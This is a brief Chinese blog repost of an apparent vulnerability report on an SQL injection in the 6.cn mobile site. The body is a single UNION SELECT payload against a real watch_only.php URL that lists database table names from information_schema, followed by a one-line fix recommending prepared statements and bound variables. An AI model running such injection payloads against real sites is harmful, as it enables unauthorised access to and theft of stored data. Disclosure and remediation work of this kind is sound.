六间房一个sql注射

凡仔科技

于 2014-04-07 16:34:26 发布

阅读量641

点赞数

分类专栏： shell 文章标签： strlen schema 数据

shell 专栏收录该内容

3 篇文章

订阅专栏

本文详细解释了一个SQL注入漏洞的实例，并提供了使用预编译语句、绑定变量和检查数据类型的修复方案，同时强调了遵循OWASP ESAPI函数的重要性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

详细说明：

http://m.6.cn/watch_only.php?id=461277 and 1=2 UNION SELECT 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from

information_schema.TABLES where TABLE_SCHEMA=0x6d36636e--

 

 

 

 

修复方案：

使用预编译语句，绑定变量，检查传输数据类型。参考OWASP ESAPI函数。

本文章来至源码世界  http://www.ymsky.net/views/101578.shtml